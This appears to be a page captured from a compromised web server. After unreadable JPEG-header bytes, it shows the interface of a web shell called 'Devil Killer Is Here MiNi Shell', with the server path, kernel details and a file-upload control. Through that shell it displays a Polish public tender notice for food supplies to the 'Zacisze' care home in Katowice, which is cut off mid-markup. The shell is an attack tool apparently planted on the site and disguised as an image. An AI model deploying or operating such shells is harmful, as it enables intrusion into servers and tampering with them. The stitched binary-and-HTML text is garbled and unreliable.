JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251120/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251120/0054639001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa żywności na potrzeby Domu Pomocy Społecznej „Zacisze” z podziałem na 9 części&#34; od 01.01.2026 r. - 30.06.2026 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ &#34;ZACISZE&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000686641</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Traktorzystów 42</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-695</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 202-54 -32</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@dpszacisze.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.biuletyn.abip.pl/dpszacisze/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Jednostka sektora finansów publicznych - jednostka budżetowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa żywności na potrzeby Domu Pomocy Społecznej „Zacisze” z podziałem na 9 części&#34; od 01.01.2026 r. - 30.06.2026 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dd4f4caa-7f55-41f8-a9b7-98b561409d6b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00546390</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00605244/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa żywności na potrzeby Domu Pomocy Społecznej &#34; ZACISZE&#34; z podziałem na 9 części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-dd4f4caa-7f55-41f8-a9b7-98b561409d6b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych.<br/>Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu „Formularza do komunikacji”<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem sprawy KP.260.3.2025. W przypadkach uniemożliwiających komunikację zamawiającego z Wykonawcami za pośrednictwem platformy e-zamówienia Zamawiający dopuszcza możliwość komunikowania się za pomocą poczty elektronicznej adres email: przetargi@dpszacisze.katowice.pl (nie dotyczy składania ofert)<br/>Pytania Wykonawców o wyjaśnienie treści SWZ nie musza być składane z uwzględnieniem powyższych rozporządzeń ani nie muszą być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły zawiera Specyfikacja Warunków Zamówienia - rozdział XXXVII</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły zawiera Specyfikacja Warunków Zamówienia - rozdział XXXVII</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KP.260.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Boczek wędzony parzony	35	kg<br/>2.	Flaki wołowe – krojone - 50	kg<br/>3.	Golonka wieprzowa	20	kg<br/>4.	Nogi wieprzowe	20	kg<br/>5.	Łopatka wieprzowa b/k 100	kg<br/>6.	Wołowe z kością – szponder	60	kg<br/>7.	Gulaszowe wołowe ekstra	30	kg<br/>8.	Goleń wołowa b/k	20	kg<br/>9.	Karczek wieprzowy b/k	100	kg<br/>10.	Żeberka wieprzowe mięsne paski	100	kg<br/>11.	Słonina 10	kg<br/>12.	Ozory wieprzowe	30	kg<br/>13.	Schab wieprzowy b/k	100	kg<br/>14.	Wołowina b/k zrazowa górna	30	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Kurczaki	100	kg<br/>2.	Filet z kurczaka	200	kg<br/>3.	Udko z kurczaka	50	kg<br/>4.	Podudzie-pałka z kurczaka	250	kg<br/>5.	Filet z indyka	100	kg<br/>6.	Skrzydła z kurczaka	150	kg<br/>7.	Żołądki z kurczaka	20	kg<br/>8.	Żołądki z indyka	20	kg<br/>9.	Udziec z kurczaka b/k i skóry	50	kg<br/>10.	Wątroba drobiowa	50	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15112000-6 - Drób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Kiełbasa podwawelska 65% mięsa	100	kg<br/>2.	Parówka gruba 50% mięsa	120	kg<br/>3.	Parówka drobiowa naturalna cienka	50	kg<br/>4.	Frankfuterki drobiowe 40	kg<br/>5.	Karczek w ziołach	30	kg<br/>6.	Ogonówka wędzona (mięso wp. min 70%)	30	kg<br/>7.	Kiełbaski białe z szynki (min.65% mięsa)	40	kg<br/>8.	Mortadela na bazie mięsa wieprzowego drobno zmielonego z przyprawami	50	kg<br/>9.	Baleron szynka (mięso wp.100%, sól peklująca, przyprawy)	50	kg<br/>10.	Szynka wp. gotowana 80% mięsa	50	kg<br/>11.	Filet maślany z piersi indyka 77% b/skóry, parzony o wysokiej zawartości białka	30	kg<br/>12.	Szynka z indyka po staropolsku	20	kg<br/>13.	Szynka wp. domowa 80% mięsa	40	kg<br/>14.	Polędwica sopocka	50	kg<br/>15.	Szynka wp. ze spichrza 80% mięsa	40	kg<br/>16.	Szynka wp. z liściem 80% mięsa	65	kg<br/>17.	Kaszanka	70	kg<br/>18.	Krotoszyńska parzona	30	kg<br/>19.	Szynka konserwowa	70	kg<br/>20.	Pierś z indyka gotowana	20	kg<br/>21.	Kiełbasa biała parzona	40	kg<br/>22.	Pasztetowa drobiowa z dodatkiem wieprzowiny-surowce drob. 40% surowce wieprz. 40%	40	kg<br/>23.	Mielonka wieprzowa	40	kg<br/>24.	Salceson włoski	20	kg<br/>25.	Krakowska parzona	50	kg<br/>26.	Żywiecka pieczona	50	kg<br/>27.	Pieczeń myśliwska	30	kg<br/>28.	Pieczeń drobiowa	30	kg<br/>29.	Schab pieczony	60	kg<br/>30.	Salami 30	kg<br/>31.	Kindziuk	20	kg<br/>32.	Indyk w galarecie	60	kg<br/>33.	Szynka wędzona	20	kg<br/>34.	Szynka krucha parzona 81% mięsa wieprzowego	30	kg<br/>35.	Pasztet z indyka pieczony	30 kg<br/>36.	Kiełbasa śląska 65% mięsa	20	kg<br/>37.	Kurczak gotowany 85%, b/skóry, parzony	50	kg<br/>38.	Polędwica z warzywami	30	kg<br/>39.	Wędlina kminkowa 65% mięsa	50	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131130-5 - Wędliny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Brukselka gat. I 50	kg<br/> 2. Brokuły różyczki gat. I 50	kg<br/> 3. Barszcz ukraiński gat. I 50	kg<br/> 4. Fasola szparagowa zielona gat. I 50	kg<br/> 5. Fasola szparagowa żółta gat. I	50	kg<br/> 6. Frytki mrożone do piekarnika	30	kg<br/> 7. Marchew mini gat. I 50	kg<br/> 8. Mieszanka 7- skł. gat. I 70	kg<br/> 9. Szpinak rozdrobniony gat. I 70	kg<br/> 10. Kalafior różyczki gat. I 60	kg<br/> 11. Włoszczyzna paski gat. I 120	kg<br/> 12. Bukiet kwiatowy warzyw gat. I 100	kg<br/> 13. Mieszanka kompotowa gat. I 350	kg<br/> 14. Wiśnia drylowana gat. I 20	kg<br/> 15. Rabarbar mrożony gat. I	30	kg<br/> 16. Truskawka mrożona gat. I 40	kg<br/> 17. Śliwka drylowana gat. I 10	kg<br/> 18. Placki ziemniaczane 1.0kg	60	szt.<br/> 19. Pierogi z mięsem (mięso wołowe gotowane 13%, mięso wp.gotowana 10,6%, bez konserwantów z dodatkiem suszonych warzyw) typu Alex-Pol lub równoważne 50	kg<br/> 20. Pierogi z kapusta i grzybami (kapusta biała kwaszona gotowana 30%, grzyby leśne duszone 6,4%) typu Alex-Pol lub równoważne	20	kg<br/> 21. Pierogi ze szpinakiem (szpinak 55%, bez konserwantów) typu Alex-Pol lub równoważne	30	kg<br/> 22. Pierogi z serem (ser twarogowy 33,6% bez konserwantów) typu Alex-Pol lub równoważne	40	kg<br/> 23. Leczo mrożone gat. I (cukinia, papryka, pomidory, cebula)	50	kg<br/> 24. Pyzy ziemniaczane z mięsem (mięso gotowane: wołowe 6,5%, wp.5,3% z suszonymi warzywami) typu Alex-Pol lub równoważne	50	kg<br/> 25. Pierogi ruskie (ziemniaki gotowane 25%, ser twarogowy półtł. 8,4% bez konserwantów) typu Alex-Pol lub równoważne	30	kg<br/> 26. Uszka z mięsem (mięso gotowane: wołowe10%, wp. 8% z suszonym warzywami bez konserwantów) typu Alex-Pol lub równoważne	25	kg<br/> 27. Kluski śląskie (ziemniaki gotow. 63%, skrobia ziemniaczana, pł ziemn. 5,4%) typu Alex-Pol lub równoważne	50	kg<br/> 28. Knedle z truskawkami (ziemniaki gotow. 59%, truskawki 16,5%) typu Alex-Pol lub równoważne	100	kg<br/> 29. Malina cała 95%	30	kg<br/> 30. Kartacze z mięsem -produkt głęboko mrożony ziemniaki gotowane 48%, skrobia ziemniaczana, grysik ziemniaczany, mięso wołowe gotowane 6,7% mięso wieprzowe gotowane 4% dodatki i przyprawy	50	kg<br/> 31. Jagoda czarna	20	kg<br/> 32. Kulki ziemniaczane (ziemniaki, olej słonecznikowy, cebula w proszku, przyprawy	40	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331100-8 - Warzywa świeże lub mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie dokonana wg następującego wzoru (odpowiednio dla każdej części):<br/><br/>najniższa cena spośród nieodrzuconych ofert<br/>P = ( ---------------------------------------------------------- x waga )<br/>cena oferty ocenianej<br/><br/>gdzie: <br/>P - oznacza ilość punktów przyznanych ofercie w kryterium nr 1 „cena oferty”, <br/>waga - stanowi procentowe znaczenie kryterium nr 1<br/>Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/>Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów i tę ofertę Zamawiający wybierze do realizacji zamówienia. Pozostałe oferty otrzymają odpowiednio mniej punktów, wg powyższego wzoru.</span></h3> <h3 